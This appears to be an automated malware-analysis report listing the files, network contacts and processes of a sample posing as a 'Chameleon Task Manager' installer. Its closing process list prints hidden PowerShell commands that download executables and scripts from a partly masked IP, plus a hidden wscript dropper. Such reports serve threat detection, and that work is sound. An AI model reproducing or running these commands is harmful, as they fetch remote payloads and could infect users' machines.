Technical Information
- %TEMP%\aut1.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-8H7I0.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-UQNOL.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-SJCT5.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-K7J3U.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-918N5.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-62DDD.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-JA8BU.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-8J8GS.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-RTG6O.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-1816E.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-KBJ02.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-QB48E.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-STRRI.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-R96M8.tmp
- %ProgramFiles%\Chameleon Task Manager\unins000.dat
- %CommonProgramFiles%\Chameleon Manager\Language\is-LSVQC.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-FF34A.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-4IO08.tmp
- %ProgramFiles%\Chameleon Task Manager\is-B4TV8.tmp
- %ProgramFiles%\Chameleon Task Manager\is-1QNQF.tmp
- %ProgramFiles%\Chameleon Task Manager\is-0MD3P.tmp
- %ProgramFiles%\Chameleon Task Manager\is-7J3OJ.tmp
- %ProgramFiles%\Chameleon Task Manager\is-VCPVR.tmp
- %ALLUSERSPROFILE%\Start Menu\Programs\Chameleon Task Manager\Chameleon Task Manager.lnk
- %ALLUSERSPROFILE%\Desktop\Chameleon Task Manager.lnk
- %ALLUSERSPROFILE%\Start Menu\Programs\Chameleon Task Manager\Chameleon Task Manager on the Web.lnk
- %ALLUSERSPROFILE%\Start Menu\Programs\Chameleon Task Manager\Registration online.lnk
- %ProgramFiles%\Chameleon Task Manager\unins000.msg
- %CommonProgramFiles%\Chameleon Manager\Language\is-TAFLT.tmp
- %CommonProgramFiles%\Chameleon Manager\Language\is-VM09F.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-7E1AU.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-MG6VJ.tmp
- %APPDATA%\ctask.exe
- %TEMP%\aut2.tmp
- %APPDATA%\update.exe
- %TEMP%\is-U7UHU.tmp\ctask.tmp
- %APPDATA%\DSAdaDSDA.js
- %TEMP%\is-7FF3P.tmp\background.bmp
- %ProgramFiles%\Chameleon Task Manager\is-OI53R.tmp
- %ProgramFiles%\Chameleon Task Manager\is-M3TGE.tmp
- %CommonProgramFiles%\Chameleon Manager\is-D6JCJ.tmp
- %CommonProgramFiles%\Chameleon Manager\is-UAKBM.tmp
- %CommonProgramFiles%\Chameleon Manager\is-IA32B.tmp
- %CommonProgramFiles%\Chameleon Manager\is-735RS.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-8RQ4P.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-CAKCT.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-6JIGH.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-Q41JM.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-KPUAT.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-AMR99.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-66MK9.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-7DSBL.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-5HI1O.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-2C3MF.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-17TT9.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-QDIRH.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-4IT02.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-NFUOU.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-BNR0I.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-G3GV1.tmp
- %ProgramFiles%\Chameleon Task Manager\Language\is-RH56D.tmp
- %HOMEPATH%\My Documents\Chameleon files\Log\task.log
- %TEMP%\aut1.tmp
- %TEMP%\aut2.tmp
- from %ProgramFiles%\Chameleon Task Manager\is-OI53R.tmp to %ProgramFiles%\Chameleon Task Manager\unins000.exe
- from %CommonProgramFiles%\Chameleon Manager\Language\is-8H7I0.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Croatian.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-UQNOL.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Czech.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-SJCT5.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Dutch.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-K7J3U.tmp to %CommonProgramFiles%\Chameleon Manager\Language\english.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-918N5.tmp to %CommonProgramFiles%\Chameleon Manager\Language\French.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-62DDD.tmp to %CommonProgramFiles%\Chameleon Manager\Language\FrenchNew.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-JA8BU.tmp to %CommonProgramFiles%\Chameleon Manager\Language\German.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-8J8GS.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Hindi.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-RTG6O.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Hungarian.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-1816E.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Italian.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-KBJ02.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Polish.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-QB48E.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Portuguese-br.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-STRRI.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Russian.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-VM09F.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Serbian.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-R96M8.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Slovak.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-LSVQC.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Spanish.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-FF34A.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Turkish.lng
- from %CommonProgramFiles%\Chameleon Manager\Language\is-4IO08.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Ukrainian.lng
- from %ProgramFiles%\Chameleon Task Manager\is-B4TV8.tmp to %ProgramFiles%\Chameleon Task Manager\home.url
- from %ProgramFiles%\Chameleon Task Manager\is-1QNQF.tmp to %ProgramFiles%\Chameleon Task Manager\license.txt
- from %ProgramFiles%\Chameleon Task Manager\is-0MD3P.tmp to %ProgramFiles%\Chameleon Task Manager\register.url
- from %CommonProgramFiles%\Chameleon Manager\Language\is-TAFLT.tmp to %CommonProgramFiles%\Chameleon Manager\Language\Chinese.lng
- from %ProgramFiles%\Chameleon Task Manager\is-7J3OJ.tmp to %ProgramFiles%\Chameleon Task Manager\readme.txt
- from %ProgramFiles%\Chameleon Task Manager\Language\is-7E1AU.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Ukrainian.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-6JIGH.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Spanish.lng
- from %ProgramFiles%\Chameleon Task Manager\is-M3TGE.tmp to %ProgramFiles%\Chameleon Task Manager\manager_task.exe
- from %CommonProgramFiles%\Chameleon Manager\is-D6JCJ.tmp to %CommonProgramFiles%\Chameleon Manager\monitor.exe_new
- from %CommonProgramFiles%\Chameleon Manager\is-UAKBM.tmp to %CommonProgramFiles%\Chameleon Manager\proc64.exe_new
- from %CommonProgramFiles%\Chameleon Manager\is-IA32B.tmp to %CommonProgramFiles%\Chameleon Manager\cham_ex32.dll_new
- from %CommonProgramFiles%\Chameleon Manager\is-735RS.tmp to %CommonProgramFiles%\Chameleon Manager\cham_ex64.dll_new
- from %ProgramFiles%\Chameleon Task Manager\Language\is-8RQ4P.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Chinese.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-MG6VJ.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Croatian.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-CAKCT.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Czech.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-Q41JM.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Dutch.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-KPUAT.tmp to %ProgramFiles%\Chameleon Task Manager\Language\english.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-AMR99.tmp to %ProgramFiles%\Chameleon Task Manager\Language\French.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-66MK9.tmp to %ProgramFiles%\Chameleon Task Manager\Language\FrenchNew.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-7DSBL.tmp to %ProgramFiles%\Chameleon Task Manager\Language\German.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-5HI1O.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Hindi.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-2C3MF.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Hungarian.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-17TT9.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Italian.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-QDIRH.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Polish.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-4IT02.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Portuguese-br.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-NFUOU.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Russian.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-BNR0I.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Serbian.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-G3GV1.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Slovak.lng
- from %ProgramFiles%\Chameleon Task Manager\Language\is-RH56D.tmp to %ProgramFiles%\Chameleon Task Manager\Language\Turkish.lng
- from %ProgramFiles%\Chameleon Task Manager\is-VCPVR.tmp to %ProgramFiles%\Chameleon Task Manager\task.chm
- 'ip###ger.com':443
- 'ch#####on-managers.com':80
- 'ch########managers-hdr.appspot.com':443
- http://www.ch#####on-managers.com/static/?ca###################################################### via ch#####on-managers.com
- DNS ASK ip###ger.com
- DNS ASK www.ch#####on-managers.com
- DNS ASK ch########managers-hdr.appspot.com
- '%APPDATA%\ctask.exe' /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
- '%APPDATA%\update.exe'
- '%TEMP%\is-U7UHU.tmp\ctask.tmp' /SL5="$100E0,3806021,121344,%APPDATA%\ctask.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
- '<SYSTEM32>\wscript.exe' //B //Nologo //T:360 "%APPDATA%\DSAdaDSDA.js"
- '%ProgramFiles%\Chameleon Task Manager\manager_task.exe' /trialregister
- '<SYSTEM32>\cmd.exe' /c if exist "%APPDATA%\idinahui444.bin" del /f /q "%APPDATA%\DSAdaDSDA.js"&exit
- '<SYSTEM32>\cmd.exe' /c if exist "%APPDATA%\DSAdaDSDA.js" start wscript.exe //B //Nologo //T:360 "%APPDATA%\DSAdaDSDA.js"
- '<SYSTEM32>\cmd.exe' /c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http://91.##3.80.160/net7_pat/desktop.ini.lnk','%HOMEPATH%\Start Menu\Pr...
- '<SYSTEM32>\cmd.exe' /c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http://91.##3.80.160/net7_pat/7za.exe','%APPDATA%\7za.exe');
- '<SYSTEM32>\cmd.exe' /c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http://91.##3.80.160/net7_pat/get.php','%APPDATA%\LogList.rtf');
- '<SYSTEM32>\cmd.exe' /c powershell.exe -noprofile -executionpolicy bypass -windowstyle hidden (new-object system.net.webclient).downloadfile('http://91.##3.80.160/net7_pat/Upd.cmd','%APPDATA%\Upd.cmd');